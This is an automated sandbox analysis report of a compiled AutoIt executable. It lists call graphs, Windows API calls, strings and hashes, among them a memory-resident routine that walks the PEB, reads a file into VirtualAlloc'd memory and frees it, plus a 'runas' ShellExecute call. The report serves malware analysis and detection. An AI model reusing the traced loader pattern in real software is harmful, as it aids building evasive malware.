86976->86977 86979 414d04 __fread_nolock 61 API calls 86977->86979 86978->86983 86980 452c99 86979->86980 86981 414d04 __fread_nolock 61 API calls 86980->86981 86982 452cba 86981->86982 86984 414d04 __fread_nolock 61 API calls 86982->86984 86983->86969 86983->86971 86985 452ccb 86984->86985 86986 414d04 __fread_nolock 61 API calls 86985->86986 86987 452cdc 86986->86987 86988 414d04 __fread_nolock 61 API calls 86987->86988 86989 452ced 86988->86989 87018 431e1f GetTempPathW GetTempFileNameW 86989->87018 86991 452cfd 86992 4149c2 116 API calls 86991->86992 87006 452d0f 86992->87006 86993 452d1a 86993->86838 86994 452de2 86995 414a46 __fcloseall 82 API calls 86994->86995 86996 452dec 86995->86996 86997 452e15 86996->86997 86998 452df9 DeleteFileW 86996->86998 87000 452ea6 CopyFileW 86997->87000 87004 452e20 86997->87004 86998->86838 86999 414d04 __fread_nolock 61 API calls 86999->87006 87001 452ebd DeleteFileW 87000->87001 87002 452ed9 DeleteFileW 87000->87002 87001->86838 87019 431ddb CreateFileW 87002->87019 87007 44b1a9 117 API calls 87004->87007 87006->86993 87006->86994 87006->86999 87008 4142b6 79 API calls 87006->87008 87009 452e86 87007->87009 87008->87006 87009->87002 87010 452e8a DeleteFileW 87009->87010 87010->86838 87011->86819 87012->86826 87014 4339d2 FindFirstFileW 87013->87014 87015 4339f5 87013->87015 87016 4339e3 87014->87016 87017 4339ea FindClose 87014->87017 87015->86957 87016->86957 87017->87015 87018->86991 87020 431e02 SetFileTime CloseHandle 87019->87020 87021 431e1a 87019->87021 87020->87021 87021->86838 87022 42d154 87026 480a8d 87022->87026 87024 42d161 87025 480a8d 244 API calls 87024->87025 87025->87024 87027 480ae4 87026->87027 87028 480b26 87026->87028 87030 480aeb 87027->87030 87031 480b15 87027->87031 87029 40bc70 52 API calls 87028->87029 87045 480b2e 87029->87045 87033 480aee 87030->87033 87034 480b04 87030->87034 87059 4805bf 244 API calls 87031->87059 87033->87028 87035 480af3 87033->87035 87058 47fea2 244 API calls __itow_s 87034->87058 87057 47f135 244 API calls 87035->87057 87037 40e0a0 52 API calls 87037->87045 87040 408f40 VariantClear 87042 481156 87040->87042 87041 480aff 87041->87040 87043 408f40 VariantClear 87042->87043 87044 48115e 87043->87044 87044->87024 87045->87037 87045->87041 87046 401980 53 API calls 87045->87046 87048 40c2c0 52 API calls 87045->87048 87049 408e80 VariantClear 87045->87049 87050 40e710 53 API calls 87045->87050 87051 40a780 244 API calls 87045->87051 87052 480ff5 87045->87052 87060 45377f 52 API calls 87045->87060 87061 45e951 53 API calls 87045->87061 87062 40e830 53 API calls 87045->87062 87063 47925f 53 API calls 87045->87063 87064 47fcff 244 API calls 87045->87064 87046->87045 87048->87045 87049->87045 87050->87045 87051->87045 87065 45e737 90 API calls 3 library calls 87052->87065 87057->87041 87058->87041 87059->87041 87060->87045 87061->87045 87062->87045 87063->87045 87064->87045 87065->87041 87066 425b2b 87071 40f000 87066->87071 87070 425b3a 87072 4115d7 52 API calls 87071->87072 87073 40f007 87072->87073 87074 4276ea 87073->87074 87080 40f030 87073->87080 87079 41130a 51 API calls __cinit 87079->87070 87081 40f039 87080->87081 87082 40f01a 87080->87082 87110 41130a 51 API calls __cinit 87081->87110 87084 40e500 87082->87084 87085 40bc70 52 API calls 87084->87085 87086 40e515 GetVersionExW 87085->87086 87087 402160 52 API calls 87086->87087 87088 40e557 87087->87088 87111 40e660 87088->87111 87094 427674 87097 4276c6 GetSystemInfo 87094->87097 87096 40e5cd GetCurrentProcess 87132 40ef20 LoadLibraryA GetProcAddress 87096->87132 87098 4276d5 GetSystemInfo 87097->87098 87101 40e5e0 87101->87098 87125 40efd0 87101->87125 87103 40e629 87129 40ef90 87103->87129 87106 40e641 FreeLibrary 87107 40e644 87106->87107 87108 40e653 FreeLibrary 87107->87108 87109 40e656 87107->87109 87108->87109 87109->87079 87110->87082 87112 40e667 87111->87112 87113 42761d 87112->87113 87114 40c600 52 API calls 87112->87114 87115 40e55c 87114->87115 87116 40e680 87115->87116 87117 40e687 87116->87117 87118 427616 87117->87118 87119 40c600 52 API calls 87117->87119 87120 40e566 87119->87120 87120->87094 87121 40ef60 87120->87121 87122 40e5c8 87121->87122 87123 40ef66 LoadLibraryA 87121->87123 87122->87096 87122->87101 87123->87122 87124 40ef77 GetProcAddress 87123->87124 87124->87122 87126 40e620 87125->87126 87127 40efd6 LoadLibraryA 87125->87127 87126->87097 87126->87103 87127->87126 87128 40efe7 GetProcAddress 87127->87128 87128->87126 87133 40efb0 LoadLibraryA GetProcAddress 87129->87133 87131 40e632 GetNativeSystemInfo 87131->87106 87131->87107 87132->87101 87133->87131 87134 425b5e 87139 40c7f0 87134->87139 87138 425b6d 87174 40db10 52 API calls 87139->87174 87141 40c82a 87175 410ab0 6 API calls 87141->87175 87143 40c86d 87144 40bc70 52 API calls 87143->87144 87145 40c877 87144->87145 87146 40bc70 52 API calls 87145->87146 87147 40c881 87146->87147 87148 40bc70 52 API calls 87147->87148 87149 40c88b 87148->87149 87150 40bc70 52 API calls 87149->87150 87151 40c8d1 87150->87151 87152 40bc70 52 API calls 87151->87152 87153 40c991 87152->87153 87176 40d2c0 52 API calls 87153->87176 87155 40c99b 87177 40d0d0 53 API calls 87155->87177 87157 40c9c1 87158 40bc70 52 API calls 87157->87158 87159 40c9cb 87158->87159 87178 40e310 53 API calls 87159->87178 87161 40ca28 87162 408f40 VariantClear 87161->87162 87163 40ca30 87162->87163 87164 408f40 VariantClear 87163->87164 87165 40ca38 GetStdHandle 87164->87165 87166 429630 87165->87166 87167 40ca87 87165->87167 87166->87167 87168 429639 87166->87168 87173 41130a 51 API calls __cinit 87167->87173 87179 4432c0 57 API calls 87168->87179 87170 429641 87180 44b6ab CreateThread 87170->87180 87172 42964f CloseHandle 87172->87167 87173->87138 87174->87141 87175->87143 87176->87155 87177->87157 87178->87161 87179->87170 87180->87172 87181 44b5cb 58 API calls 87180->87181 87182 425b6f 87187 40dc90 87182->87187 87186 425b7e 87188 40bc70 52 API calls 87187->87188 87189 40dd03 87188->87189 87195 40f210 87189->87195 87192 40dd96 87193 40ddb7 87192->87193 87198 40dc00 52 API calls 2 library calls 87192->87198 87194 41130a 51 API calls __cinit 87193->87194 87194->87186 87199 40f250 RegOpenKeyExW 87195->87199 87197 40f230 87197->87192 87198->87192 87200 425e17 87199->87200 87201 40f275 RegQueryValueExW 87199->87201 87200->87197 87202 40f2c3 RegCloseKey 87201->87202 87203 40f298 87201->87203 87202->87197 87204 40f2a9 RegCloseKey 87203->87204 87205 425e1d 87203->87205 87204->87197 87206 2e4295b 87209 2e425d0 87206->87209 87208 2e429a7 87210 2e40000 GetPEB 87209->87210 87219 2e4266f 87210->87219 87212 2e426a0 CreateFileW 87218 2e426ad 87212->87218 87212->87219 87213 2e426c9 VirtualAlloc 87214 2e426ea ReadFile 87213->87214 87213->87218 87217 2e42708 VirtualAlloc 87214->87217 87214->87218 87215 2e428bc VirtualFree 87216 2e428ca 87215->87216 87216->87208 87217->87218 87217->87219 87218->87215 87218->87216 87219->87213 87219->87218 87220 2e427d0 CloseHandle 87219->87220 87221 2e427e0 VirtualFree 87219->87221 87222 2e434e0 GetPEB 87219->87222 87220->87219 87221->87219 87223 2e4350a 87222->87223 87223->87212

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                                    • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                                                    • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                                  • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                                    • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                                  • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                                  • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                                    • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                    • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                    • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                    • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                    • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                    • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                    • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                  Strings
                                                                                                                  • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                                                                  • runas, xrefs: 0042E2AD, 0042E2DC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                                                  • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                  • API String ID: 2495805114-3383388033
                                                                                                                  • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                                                                  • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                                  • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                                                                  • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1187 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1196 40e582-40e583 1187->1196 1197 427674-427679 1187->1197 1200 40e585-40e596 1196->1200 1201 40e5ba-40e5cb call 40ef60 1196->1201 1198 427683-427686 1197->1198 1199 42767b-427681 1197->1199 1203 427693-427696 1198->1203 1204 427688-427691 1198->1204 1202 4276b4-4276be 1199->1202 1205 427625-427629 1200->1205 1206 40e59c-40e59f 1200->1206 1219 40e5ec-40e60c 1201->1219 1220 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1201->1220 1221 4276c6-4276ca GetSystemInfo 1202->1221 1203->1202 1210 427698-4276a8 1203->1210 1204->1202 1212 427636-427640 1205->1212 1213 42762b-427631 1205->1213 1208 40e5a5-40e5ae 1206->1208 1209 427654-427657 1206->1209 1215 40e5b4 1208->1215 1216 427645-42764f 1208->1216 1209->1201 1214 42765d-42766f 1209->1214 1217 4276b0 1210->1217 1218 4276aa-4276ae 1210->1218 1212->1201 1213->1201 1214->1201 1215->1201 1216->1201 1217->1202 1218->1202 1222 40e612-40e623 call 40efd0 1219->1222 1223 4276d5-4276df GetSystemInfo 1219->1223 1220->1219 1230 40e5e8 1220->1230 1221->1223 1222->1221 1229 40e629-40e63f call 40ef90 GetNativeSystemInfo 1222->1229 1233 40e641-40e642 FreeLibrary 1229->1233 1234 40e644-40e651 1229->1234 1230->1219 1233->1234 1235 40e653-40e654 FreeLibrary 1234->1235 1236 40e656-40e65d 1234->1236 1235->1236
                                                                                                                  APIs
                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                                                  • String ID: 0SH
                                                                                                                  • API String ID: 3363477735-851180471
                                                                                                                  • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                  • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                                  • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                  • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: IsThemeActive$uxtheme.dll
                                                                                                                  • API String ID: 2574300362-3542929980
                                                                                                                  • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                  • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                                                  • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                  • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?), ref: 004339C7
                                                                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 004339D8
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 48322524-0
                                                                                                                  • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                  • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                                  • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                  • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                                                  APIs
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                                  • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                                  • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                  • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                  • API String ID: 1762048999-758534266
                                                                                                                  • Opcode ID: f563e2a7d89e8d19bde99fd3a4c7adcde2789a6e64fa40d9a2f9d65c4e7ca17d
                                                                                                                  • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                                  • Opcode Fuzzy Hash: f563e2a7d89e8d19bde99fd3a4c7adcde2789a6e64fa40d9a2f9d65c4e7ca17d
                                                                                                                  • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                                                                  • _fseek.LIBCMT ref: 00452B3B
                                                                                                                  • __wsplitpath.LIBCMT ref: 00452B9B
                                                                                                                  • _wcscpy.LIBCMT ref: 00452BB0
                                                                                                                  • _wcscat.LIBCMT ref: 00452BC5
                                                                                                                  • __wsplitpath.LIBCMT ref: 00452BEF
                                                                                                                  • _wcscat.LIBCMT ref: 00452C07
                                                                                                                  • _wcscat.LIBCMT ref: 00452C1C
                                                                                                                  • __fread_nolock.LIBCMT ref: 00452C53
                                                                                                                  • __fread_nolock.LIBCMT ref: 00452C64
                                                                                                                  • __fread_nolock.LIBCMT ref: 00452C83
                                                                                                                  • __fread_nolock.LIBCMT ref: 00452C94
                                                                                                                  • __fread_nolock.LIBCMT ref: 00452CB5
                                                                                                                  • __fread_nolock.LIBCMT ref: 00452CC6
                                                                                                                  • __fread_nolock.LIBCMT ref: 00452CD7
                                                                                                                  • __fread_nolock.LIBCMT ref: 00452CE8
                                                                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                  • __fread_nolock.LIBCMT ref: 00452D78
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2054058615-0
                                                                                                                  • Opcode ID: 261ea3e649c629e7f6dbf375053436b3ded7ec84625d927aca874652b6838b5a
                                                                                                                  • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                                                                  • Opcode Fuzzy Hash: 261ea3e649c629e7f6dbf375053436b3ded7ec84625d927aca874652b6838b5a
                                                                                                                  • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66

                                                                                                                  Control-flow Graph

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                                  • API String ID: 0-1896584978
                                                                                                                  • Opcode ID: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                                                                                  • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                                                  • Opcode Fuzzy Hash: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                                                                                  • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                  • __wcsicoll.LIBCMT ref: 00402007
                                                                                                                  • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                  • __wcsicoll.LIBCMT ref: 00402033
                                                                                                                    • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                                  • __wcsicoll.LIBCMT ref: 00402049
                                                                                                                  • _wcscpy.LIBCMT ref: 0040207C
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
